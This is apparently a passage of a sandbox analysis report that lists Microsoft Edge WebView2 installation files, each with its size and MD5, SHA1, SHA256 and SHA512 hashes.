C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\MEIPreload\manifest.json
Filesize
1KB

MD5
5fd272df834c336fd234092c7b08c517

SHA1
3148ce242843f4db0e9e5bb2e8246cb1a6e4a10b

SHA256
b54e7c94ba52b3a746a2647e2c8c91d43f209fd17560661df60214a08605d7fb

SHA512
daf09381683d7a8606c26644d61793fa8aa4250faeba484eea00b76a04c16b1c360d956b856155f2b1abe3e85b97f5ae29858ce0fa9bc186e96a40e095f08b5b

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\MEIPreload\preloaded_data.pb
Filesize
9KB

MD5
67c42f96e8cd811d6acc5714b0ccc92b

SHA1
0b69ce795caf73055b26fe5225a0c0333828761f

SHA256
567f61c46904fe8e28baf71b8ad9792ac3a5f653b4512bec2b54a0922572cc02

SHA512
5a25d58eda231781dc0608f6678414558d5264a10877dce2b2475fe5aadfd115f873e0c5887478c1fa363d0be017a41b74775749dbc81a2cd50c52b86c2ecff0

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Extensions\external_extensions.json.DATA
Filesize
1KB

MD5
ccd5dee4574c70c0f1bd6df8ea435030

SHA1
25d27d71856e2e45a21d2fe81d0388ed9b6cca53

SHA256
572dab47ff5e7b383b97ad8c0f38dfaf1dfa85db6b5c1fad8b23d6f071b7ef15

SHA512
30428fc024543143564c365e41d386353bcc38a73c53c68c4b629f3f765bbb3af0211076a181084d763ecf99439dfeaa4ec6e505b52419ab7a367ba0ab6cf568

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\af.pak.DATA
Filesize
995KB

MD5
a56ce7d3aee99a0be4b4701b1dbc0ccd

SHA1
34fa69caa39327e0fae7ccaa8246c857437af551

SHA256
9c4de0d62b43a2442a6b03421328d54d2cd8663ad33e9d860adebdf9b76dcbde

SHA512
0486d107f572aadf19046cea8fdd0abe8b911b197c9929636d6c88dd3b3f3c67485b9a71ed34972e29c3a990f5faeb9dcd12ddae35a9825870674b3f4c84009d

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\am.pak.DATA
Filesize
1.4MB

MD5
540e612346cc41f703309651be6c0378

SHA1
5c7c60bad7449ccf6253f81affa120ea85ed0530

SHA256
a93c9588ba9bd6b28556a5a08e1185d4f2fc292ad68a22e7f2e27a32a1d26558

SHA512
db2999e74f1b89466ec4ca2d9326031e316aec3296a8e5ec188662ea958c7fba714a9cb3283204a795fbcb2a827979a40a89f7a44fd7891bff34691d18532d7c

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\bs.pak.DATA
Filesize
1.0MB

MD5
e8c29c119b5561ed0bbd83fbb1416a97

SHA1
0a64ff5b9aefc051c1f985fee50481e8838d6aa2

SHA256
280ca1046ff58fe5be650aaf8276fbcb09447d8c99d7941de6d383a1215576f0

SHA512
ac5712a7a1244f712d707c7162774ce99c6fcc5cb599b37e6f67f9839a4e8229cedecb169925f8a3162f1776ae0fefc4c8a59a0465b55ef904ae1dc707583ad8

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ca.pak.DATA
Filesize
1.1MB

MD5
6fa3217f298868ef82f68bec70da408d

SHA1
2159e3c6ee049a45da14756ed2fbf9f2c7746ac8

SHA256
2801c857e110b44d2e7fde69dba1f452a26d4968600bea343aa10061a207e2b7

SHA512
f3fee53ee032f95bbecc5eedd2b7a77ba8c2dfca98c5e2beee7e115b8ad67e1adac21b886adb137f3cbafb332c949252269fe262b05aa85ec656a1aaec88bd6f

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\cs.pak.DATA
Filesize
1.1MB

MD5
0fca39434222c70bb85a6db077e5bf44

SHA1
5d563d93a983f1749bfc670281c8a382602f41e1

SHA256
4cb0e495363ba323299ceb17165f148a5ad636ca45d63c617295e71a89923265

SHA512
0221778d8af9ed3092233493cc7b881ebdb3d0d91bc6310d700b7715fa0ec6ebb4539b36385c9704b79def86b96821ef9f2250cb7de29413d0c1d7cc0665d1e9

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\es-419.pak.DATA
Filesize
1.1MB

MD5
1277712e7cdb67b3582a3fe88c93e094

SHA1
c0edfea5cd980fcb8b8f339da834a080b3d6a591

SHA256
dfaec1896d514a85a7dda38bb60a6bcf58f9eaef700bbcaf35a89e20b1815b0f

SHA512
58de0518888cd0ea3bb5fa861af7809386dc7261201987c05dc64b86cd685b695bd41c9ce4d767eb5ba2d8212b5b0ac7b265b22ff08b59f375632e02aa4be642

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\et.pak.DATA
Filesize
982KB

MD5
6b05c7b47bca938b6f78a73a74f60758

SHA1
5c0214f795354b6a38acfd799dc9e79de2218e38

SHA256
d0e2c7c822e5f692a4e0d8e85a38fe44dbdce89533a94b787b5092308e56deae

SHA512
7514aaa27bcbec23efaf541970e1d9db8bd1bb03574377a0071c6bb7b8ade134fc74fd1ebbc580731484be897bd142cad6191c936fb27a7b72bcb330847c662a

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\eu.pak.DATA
Filesize
1021KB

MD5
c01b5d8038ffd88ade46df4c0051cbfe

SHA1
49809151231b27100165d7448c1335f3a7bbc831

SHA256
21b6787c7c3fa60cf31dcfcd08c7ad1440a7d16ebde8df07a3e0ab4677f0ea75

SHA512
d4af9c8ab42ba12403aa8b523f94a36a750cedc38224494f137a697be725bf2efd1634e62dc4af991d43c07a7be9e35e234e089e9675fb791088e387693db957

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\gd.pak.DATA
Filesize
1.2MB

MD5
3c012460dcce5d0a6605922e6fcdd762

SHA1
0361d002ca1b3b4931a5c92a0c9f6c8cf1816b8c

SHA256
85b9fe772c05ab854fdc383c05ad90b1d5e2c820b116eb82bb37730c764567df

SHA512
251553fcc00bfe8e29ba1ddb2bf12038e2a4b44281b8a47f54df443a6e3679a8e1f0673b6a4dad5c6e0635c0c506c63860454d430c81de2fa86e50ac47ce15b0

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\gu.pak.DATA
Filesize
2.1MB

MD5
6b0f76dafbb5907d5baed59c0c97c590

SHA1
decf59254df3637ec0533b5196d0a5401e394832

SHA256
2a33bc47f2f12319be8d036452957c7f3a54658992536d896ddc55deb3bcf877

SHA512
1feb054d8053f6cc8128fe782d40ba48fd768e10716f71164f967a82f10b46af8111778395a45d2a06253fcc13c6eadd3f517a0abc8a59509fe9bc59c5a911dc

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\he.pak.DATA
Filesize
1.2MB

MD5
7c910c9f4ff60be54bc90544c777a9d8

SHA1
d0cc823f830fc2a14725a00d105b13597260040b

SHA256
42f8a4677d15eec358fee113bb7f2bd2c9ac46914da9aa5096fe8bd4a6bf5031

SHA512
14b2ec93329a122ef061ba5641d23e9b9676094e8d3aaeb9e636c16468e1c6a7cc49cf819eb5094fe47d8f642f944465aa64eb14da7545096990059175a6c562

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ja.pak.DATA
Filesize
1.2MB

MD5
085ab9f19e4dc670a67902654ad85ada

SHA1
d4798564e2b7dd40c65144718d89127364c742a1

SHA256
2e094dccabb3046691d03fc6c274e500c044757794a194c2fca435b388b8d895

SHA512
15402c2a1052cca91d1819e0cd41944acfdbc612169969858bcf2af80f3fedc7556c280051ae82fc290a345224e079fea5bb5f6c02a752680dd1f264c82c4075

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\kk.pak.DATA
Filesize
1.6MB

MD5
52b0b64289762ca3ff7f4a9927a6bf5b

SHA1
10fe6fedefd7aecb23b4156c6a5917148a69406f

SHA256
8dba44e361d2398ef2274f7001f82a6966ab77db8ac21d0a119887d5ef73f26d

SHA512
daee5088139eba252b88116036c7d1a7e244d2c9be3492b34ba50a23f18e1a06817a4c37c466b4b8a6381d0ac39183bcf1f6f0ba97fcbc364a2fb8b691d99e31

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\km.pak.DATA
Filesize
2.2MB

MD5
77fb6a815cccd95d2e222c208fef0f9e

SHA1
d96f323065dbe39eea243b367c5811f20c2c2bf3

SHA256
26d8f683e0ba26ec9f6585477e55812c048b02f98f7492df3021f67c6e5adca6

SHA512
0e815054e5d39c992683f26a0043bb0a41436635e19e142982bf775642a67024b711b86171be0bee92ffb79a57b64fd22d8b517389aa44884c2e71051294207e

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\lv.pak.DATA
Filesize
1.1MB

MD5
5cf71192ba7c74a7948d10fbea85d31f

SHA1
9bcf6ee410526e6ce09f1d3b4297dcd0e1c3593a

SHA256
7e75c7a287725ff68ad866fb6ec984988dd8051aee30ac55c8d6ea51744f3a60

SHA512
40eef9c38bebb2407769300d88e8da4a33178259d6783539e503760b6e3e5c7918172c2334dbaa893631695996793a6a0491f4aee13a680f13059635ba4de1fb

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\mk.pak.DATA
Filesize
1.7MB

MD5
2f6b2226379a3a2d668b50d0a2d17f24

SHA1
ccd9da56935fab27a0b7786529492fa8632ea649

SHA256
7c7d0bfbbca4687e53bb9ba630546905a249dcc356ef5c9fcdbf6d91ffbd0e0b

SHA512
a408f176b8592b265ed5591dff796c3d8c3f5bacc78874ce85ff2ef6b5987d61578a424fa8d642ccbad957b0336e2f1a452cb804f4f728f665b59ddf00425e2f

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ml.pak.DATA
Filesize
2.5MB

MD5
543a37aa112f140065b1fdb15dbd775f

SHA1
6910ef8975ac01b3dd70220ba62f88fd9eb8e334

SHA256
58094a9e33daf588acd935d615b8153bc9916646e0d70570c13d5e5c54239f1a

SHA512
6117a6a3ce5de0087dec66b13d284f0c7ceec8c7e294c399ba2b2d501f2555f4f1e9da5f120cd40fa7c8d885eb990f2e894e09cb1304ac5f4d91756616209ea3

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\nn.pak.DATA
Filesize
970KB

MD5
99df7f044b02b6c41d7220e1860a719d

SHA1
d3b0cb6c7e4cfe9b8210802f209fc245faac5eea

SHA256
19aedbfe361fcc76c0e7ced1ce5c914cfc1a1ad6de0c4342108f28f0319f2b3e

SHA512
ecd1258bf7a1dbbc0d94ba81313021427deea12d8d74075bc9e63be8a303ddfaa4568ec1b82bee29f574fbe51c793ceaa1ad9d998b601974aee9f4d95be72598

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\pa.pak.DATA
Filesize
2.1MB

MD5
4e29cacb7a6a473911e7767f15e4a349

SHA1
2c935e7820ff0f83d85aa75ededa785dbeff1540

SHA256
f67e602e6ca80868ef19a2918878b15573e0a0414475a6d6a94dbcf2fe2b75ee

SHA512
e7a2361060a46a73de36bf5c4292572519960b6156512b446457f4ac2a2b3352a9f5693aeb378a4c446d93cb03b2b31bc631a8b5286099a37b5b9bedca39df58

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\pl.pak.DATA
Filesize
1.1MB

MD5
4a04126d87e8cbb61c9bf75cb026c604

SHA1
58c87dbe6f030b91d1281c36d96a2bed10b472e1

SHA256
fc826146877945f08db79bfdacedf750005f6c54f95d38e022dcfce3f657af9a

SHA512
922996db684aa1fa5f8893f57a59dc02fd0d24a4c462356c5e01f6ceea4a8fe1c71e5daecfae4ccba3145911fce92db22bd762784d598e6f4e6dae124018c26a

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\sl.pak.DATA
Filesize
1.0MB

MD5
968c748ecf2c2d33e3c5d7a7852acd16

SHA1
a8ce8770fef4a7495aff6252c25c9f40d825c8a8

SHA256
b942a485dfbcac06cabee3788eb860408a1ba0da3975005c61d638aa332fe25b

SHA512
ee58ac68c309b6f63183bf3c2c0468bd935c42af7dfc6765b1a5ff3cf14c5fe1fbd60fd8847a298dfe62bdc984ae64f8c99b23d9ed7d54ed6da88769c23e5bf0

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\sr-Cyrl-BA.pak.DATA
Filesize
1.6MB

MD5
d1284e08dead3f08b75295f359325c25

SHA1
3e94b107ecfe3b359259ae6dc9e0d68e3ec4bd1b

SHA256
8fe367b0da4d789a6dc743e428084392488c8fc99358eca83d8667f014f1343a

SHA512
7b93ca3e1f08975e72e54890ee3b356126ea5bb29514b0866b86dbace13cf7b3a1b044189eb2233e6d31a49ce331a5dd03336a9e6d23ed7c2841aafda9c853eb

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\sr-Latn-RS.pak.DATA
Filesize
1.0MB

MD5
eacd4d7c7d58bdfd8faf2b030c4c4669

SHA1
6a59c2237c2cf6112f6ac26e093c1bd2f7eb2f81

SHA256
1102eb3fc6a8be827a55acd55ca62e5b713666100ce43f43021c84e3caf06c0f

SHA512
0d7061852893625f142723c6f273752ab7e49a6c20f6abe5b24574d8cef32b99a00b052e8c0f1e5684a0c1630bc9bd846c6b21c670058012465b28cfed441bb8

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\th.pak.DATA
Filesize
2.0MB

MD5
02c92b49b8a8f1ca573acb1a143c8169

SHA1
fd26ff0064512070f564006e54b74e9b11d1f415

SHA256
325c61e38e0b839e2e4d5fbab80869bf509df185436090e92d42ec5b4a7599a9

SHA512
626588df2b7d0e912ebd0584a76c8767bab80dc1b61d7ed42e63fc1aa3438a3d983462fa78a2a1730e8ea7f2f9ec23cd0cd25829457c294c8f5173780a7e459a

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\tt.pak.DATA
Filesize
1.6MB

MD5
c5a06cf49a516c4b2b8d541be9a45cc4

SHA1
1dba4c2c62e559ee6506e88ac7a791b0f47a0d6f

SHA256
d85ada88e2b21031febf0fd89d8dd4d69cdddeca79ba0ee2cbca56d39ffd1833

SHA512
99d51ea67bb6c9c2ccbbd048e24e7bbd857cfac2782374229c6f3a9e494727c44fcc059651e4eca3fd13c25d193c074c4df147c68ea86679faa5579ffdc1dc31

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\uk.pak.DATA
Filesize
1.7MB

MD5
6fa00c9654da049d188e919bb62022a0

SHA1
bb6aa8fb265abd6a6328fbe4f23f16b28f8c58ef

SHA256
b8e8b3b17551b823f87e8d7d8e3a325ae573811ebc6497aeefb19fb253c81955

SHA512
485fead432e2660d01d533d74e553efcf004f8febdd3cfd51e56b12703cbdd83f5b496af72ea6b32e48211b16a92277fe2be5301df8bc01e5bede026a7bf4612

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ur.pak.DATA
Filesize
1.5MB

MD5
49163877517bb8beb5f2d5c23d799b94

SHA1
39984d2595bcaa54030f612e8747dc8d61ee20ca

SHA256
d41957af1aa9e77cb7af2dd58983a120c710f4b32e4ee3d7b8cfd03f9d7df6bb

SHA512
1aa705051dc350bf2cfdc8d5375c3778311e3f5dd0d8cb991df326d1aff2e992733a48239f5bef05ef8ef3aa50507c155f700b9880403c07feb8d55975a29a24

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Notifications\SoftLandingAssetDark.gif.DATA
Filesize
160KB

MD5
248e545ccaf04164192e833c5a6dc103

SHA1
df3695b8ab96d11afe244634a51fe63a3726b916

SHA256
b205944b87e037f4e3f33574bc0bc178ca246b1c8a5b25a88a629df505318a7e

SHA512
9d190230fd887251e24f1437588626c3a26e67c48368b7ba36966f140c80ca0136c850fa0e05d9c7fad20debb99449823b6b380155d9f33f6570e141de298717

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Mu\CompatExceptions.DATA
Filesize
2KB

MD5
9124fef12ed97cf89d142d688bffcfb7

SHA1
9cc3ae2f9e95ca9688e9050838371bcd8c52dce0

SHA256
25ca1a45fb3f76ba29f02fab82ea6b5ee889f673f6b1433bfbd216cf754dd1e1

SHA512
0e40b6facf541ecf42b2d086458a038a2228fb61ab0e910765a0abbfe70c6cea04a7dbe13e1dbdaffab15f7552d29b554bd7af7325fbc6a7d17d27d9a949651e

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Mu\Content.DATA
Filesize
8KB

MD5
ed4adc169e0d34e0c4220ff70f700c1a

SHA1
10634e7eb0b1605a5e6f18727de84b9990a2db90

SHA256
e0bf758eff513d3728eb20c5572615cee77df3ded9208b1f4fb3e9b7c705e878

SHA512
b5603c8e49e4072ce688bbe45a697018246a094f96463bef2ece4f9995dd27f3ba544290313ab02f54910a00436c99425878cdde52305d15ec2ce084f22b5431

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Mu\Cryptomining.DATA
Filesize
2KB

MD5
4fa273e09712e417e5d1948146f70593

SHA1
e7f9885a93ed0d9dc5e362bf82aac93250506ae5

SHA256
79b455f249327299a8b92df96db765b587bf8c7d84f97ba7dcc25eb44a41453b

SHA512
d9b65ab7b98b7332ae06ed990090a7a1adcb870ac6f5bee4df7d437295e80d22d582758ef6c4957f689798bd5909773a34e0bdbf73a3e0bcb6c7ef59e927508c

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Mu\Fingerprinting.DATA
Filesize
2KB

MD5
3c808aed752bf768ee9a5d7a7ff9725b

SHA1
a76b41485901c53f2be9672f93c586efb378623e

SHA256
b2ae1dbd93d7171732c9766868d69e741d69a87cfb0716e330d3abfedaac8e4e

SHA512
6e67a483a09c58a77fc92e3df855ba3b879664ea5e1d1d2ac6aa59311f7665c1651cabff67e4aabd6cba79498b237fe6863b5e483870eac92b51f45f5dc8cf1b

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Sigma\Analytics.DATA
Filesize
1KB

MD5
fdb92d8c1b64f7b5dc755691bc5cdfc8

SHA1
298b88ea563ae4542d2fa6610246524acddeb3e9

SHA256
ceb92afe8334c3c3ad9ab55a7029eef0f297385850f9a96af575e0b459a96fac

SHA512
c26a1bb33dc10a009498095511f422062eaea59f599c0c6a9668881807cb9659e6fe54bd78073944b88e0b5e550fdea7d05a7a211005832d0a4af001efde8fd6

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Sigma\Content.DATA
Filesize
1KB

MD5
e9aef7d4827ee9966ca6dbf0da081d4c

SHA1
266ee7811f48899ba54167cbb51366399e34e1fe

SHA256
57da53ce1baf0c9f63d9be71f6c7d29f1ca1f9010b8daeadb75cc7eacd5d346a

SHA512
e161f8b7ec79b4dc39be27c11a25f4112e9ceffd6e97c236a7bbea55c260b7d65b913577901ac2f724b798358b89c40b5b51399d1b022ebe0f1d9a3411e11b3f

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Sigma\Cryptomining.DATA
Filesize
1KB

MD5
1d7bbe6de1049320703f5e90ac4f7215

SHA1
505d2acd4a05b87e8147eb737bc1432e538e8edb

SHA256
7b84f618b6776e43bb78a462efc139f914007722e837f227b0b2f1964b14c234

SHA512
88e3bc6e949beac64ef832ab9d3d4e03b0e0eb1ace225a593f0295222b1b39d6b8d61444d04b53d420704cd87565ddc0bbd15744052143ae0e42d56e937281d5

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Sigma\Fingerprinting.DATA
Filesize
1KB

MD5
9e040ce1bca516c5240aa301e75b6e4e

SHA1
ed030558b0336610363d9e0cee6db9b489f3bcc3

SHA256
67ced23e6adc30c775a2d8285d94ea9cab895be4c9aa101c5a5d8075e8e1e486

SHA512
31c3ec2b85bc403e898395117b1f937fc86125898df894fcad52ad4eea7d46b41e794c2333ed9a7d8d87c967e68123268dbb06f01e0f4f2c891655c3b119dc94

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\VisualElements\Logo.png.DATA
Filesize
33KB

MD5
93b83394e009e952269dd57a19acf122

SHA1
a2a47b2cb2659a546d44eb279adfbcee23d9116d

SHA256
412fed76f4c6593b2019852991b861f62c26ae19a528a2d068a4d8b84fb68601

SHA512
745d4dca864995b6a9800659fe180a96d3f2a95bd89ee7532101752cc2ac523bdc17fd0aa41024d83391e8a2f8673a59ef4db61eb7cfe30b27fe3e177d861c76

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\VisualElements\LogoBeta.png.DATA
Filesize
30KB

MD5
bad79533d840e3752550d52354605e9f

SHA1
d5c740c0df30792f5d7741779c1c5f5916c0707a

SHA256
3b483f6031517cea1da9811c1b1c1e7af07063d5eeef64dad8449fef1ac993ff

SHA512
75074ab3926e541f3d5f6e37a77ec277805c77e329687b35f9c804e4d3155c79c2db42acf9369c97056281132f7a813e39931f9dacc1507bfb9011102acede0f

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\VisualElements\LogoCanary.png.DATA
Filesize
30KB

MD5
9df632e77e93f52552453df4ce1f5ea1

SHA1
0d36160fdcec5091cf831d2cf4cf8f9bc0d4302b

SHA256
8d5675a0c69fb973ea55919a68df4c4592209ad44cde82d4fcad6470122c8b48

SHA512
a79f33c29b88566b4888c96c7a7d52b5c12fc748ac2327dae04ac9a2873074f5fd56c955b45fd283dad7f0b02c3d1972f60bf8b6017ae3cade7f11bf008f6028

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\VisualElements\SmallLogo.png.DATA
Filesize
16KB

MD5
b4f92ae911763af8f80d1f4fa2d4ac1b

SHA1
f8db9c69dcd648576e56253811b1f2245f394b48

SHA256
1c93a36894005389af070e6feaa37222c3137b9e208b69aaf67411652b127dea

SHA512
e7cc8592df12c5b6b30c3f13da43d0d77e7b170e98b4d2c2bfb433e4c1c41f07e8ca84b6b8d29e4a227e71331bc837b386b6b2bfd1400be7a578b82a8325dd48

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig.DATA
Filesize
2KB

MD5
afba56da85b695be0420a7063c346cbe

SHA1
c3efbe435263bf47d1eaee6beff271bc43391554

SHA256
864e7940349a4d5273c12e00f3a1b2d8cd25689fff28ff44c967a62e5cee59b1

SHA512
d95238db8da9e75a60b7f6b11ad38878ff4b0cf3217d05762fd4bc0b9f015c40b2f726c477894ff27752fe1bc9b3d1e4301df658bb4bcd1af542f87d0c032f3f

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\identity_proxy\resources.pri.DATA
Filesize
5KB

MD5
ab72f490a6b15b68dfd943b173eb7c20

SHA1
e62a08d966cf0d7ca0739b01677e8511c1b23149

SHA256
4a337f3280ceb2f38c6d290d0bcdcbb09a9a8a34d322ba1257260b93f6097aad

SHA512
199c090be270fb16acdfc2c0b404136b45b8af4b3a8b8c8f2fc89094926394118f049ba08d9d7d3a1ebfe9ccc5bc60f6063607a4a554c166805211b9cc7bfa38

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\identity_proxy\win10\identity_helper.Sparse.Canary.msix.DATA
Filesize
54KB

MD5
e13e959d8e22c83a73a62dcef8dc7873

SHA1
4f1eade150b00e1201ce6bd82aa7ec9669c95704

SHA256
219c42d019c91b615f33e406b1c2079255bd27308687e704fd1ad50a466a8adf

SHA512
1462d04e75cd26dd3494f811012cbecaf7897af257d9ed2d2e8adb2a364b426d6800c0caa577e8d5b70797f2fc347e35ee806843bed615cf9ee219b50a3f1d2f

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\identity_proxy\win10\identity_helper.Sparse.Dev.msix.DATA
Filesize
54KB

MD5
c14186fb0cc83b3f9ba5f8798870c908

SHA1
f911bf541681dda31dd8f79aa1612a51ed814316

SHA256
d55cf6266776ac56b4078d887b35e35eedad923d3696f95747428c2aa04329ad

SHA512
5a42ee6f244885c853c9d39ab9ea665f2c97427d1b95d6fc1efbb0dd377e8d7c111bbad5a0e35969a74578bfac69c15406940cf8fafdfc9de3819227d01fa14c

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\identity_proxy\win10\identity_helper.Sparse.Internal.msix.DATA
Filesize
58KB

MD5
41008e168631e6c7eeab1742c6d28f03

SHA1
e42c17e9a6973dc1f45f518bd0c4ae382cb72d0f

SHA256
e71faa0a0eba3f3cb8ffe931aff913812e2196ccd877e7d656a8949cd52c6d72

SHA512
6fa125fdebe286fec9c2ee04a584f574b8cbba8468871ce92bd655fbb3cadb9895f03eec7993fc4b88aede43a5e4668e99510254c91b992ecff37ff80e608842

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\msedgewebview2.exe.sig.DATA
Filesize
2KB

MD5
2b3bb983c7fc6f108342cb5fa98a3adc

SHA1
19090038ce8d97af56416781b3dbc98209c8b0c2

SHA256
4368f70a9618bc8bb551653b261888ce45ab9ccb5693ddff167744c899b0d958

SHA512
cd9fc950aefc8d8932c13c9bbdbdeaf338c190c6078903906c6fe7d1c6bb816e32b82615e4f0c7942266ee4ba144fe8f67fafd7a98d1257c8e36a8103493c86b

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Mu\Advertising
Filesize
26KB

MD5
d27515b8ce8f45c8148dfc8c06244eb1

SHA1
22539b12e3ddbff188d2b1e68b6cc95ae8f0e69d

SHA256
f6b68b45b8aa8cfe9abd51006a9725898bb6d8403e0a7b5d783df6882997ca00

SHA512
2ddbe4d2d9c325657c9ac3171f2b36d8358caa625bb73272e6ccefdc02d6cae51c342d529f968dd8b2af7ef5b2f793a578355ec95fa6688c6be1c191bdddd80b

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Mu\LICENSE
Filesize
35KB

MD5
9d25d6f0628089a3f12200d31d03c94e

SHA1
402a42cd84de296d183210cd845464c33360131f

SHA256
aa7902bd980c4d17ff93a6d157ec8906816240433b2623ada980423ccd3af6cb

SHA512
6836839b6910be40d43dd0e82e6d5205d7bea4dd59e193220dfbdb2b8d2c220efb1442c70c5aaa63a3d84de581469fdac64918ad3ac49ca5abffcb77870f2616

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Mu\Other
Filesize
1KB

MD5
8e5d0a6f5c8e9bee7979f5c419c73c65

SHA1
095b8603825199b37262ea5ebac5966f43b7c9ec

SHA256
1038b52f3f84cae3fcb5fbf8e5397b7349a8885396068614ceea60c8d5ae4954

SHA512
da5da602df45b586280b8e0e28bd5fa73dccbec397a3324c6d31dcbe85a4386408ce63e67ce569276de4be0038bb6745644f4d284910fdd645010f1075812804

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Mu\Social
Filesize
1KB

MD5
dc3e86d29816050a789e906fcc48c6b3

SHA1
4590f38d4fd8a5ccc075dd682f239cc7ef9b00b2

SHA256
41575833e9b4dfd48593de1646dcb5571ede70358bd98a7dc1e0869ad4420ea4

SHA512
419b6281f49e05bb20568469c982864d8ecf14f248082550e4fd6267bb01366747d458fdc83738474a38c7ab19369f7eafdacb4fdaf8c969b37a3de7992ddde8

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Mu\TransparentAdvertisers
Filesize
1KB

MD5
b31e09f8e7bcceb411f9e665d0f8833d

SHA1
d7f0b8dcf394d9ab790f2afc9734440881d5f336

SHA256
1591ab51dbebf6accebaafa3d13a64f3e085a43df119da3d8e2faddc2bd66e2f

SHA512
052713717cdaba876134ed67d5f60dfb5ba6a3057065c48c1e5efa74e44ed46d787837bc62391bcb3779e1c4d289c167aa40c23f29db826407b2746213725a73

Download Submit
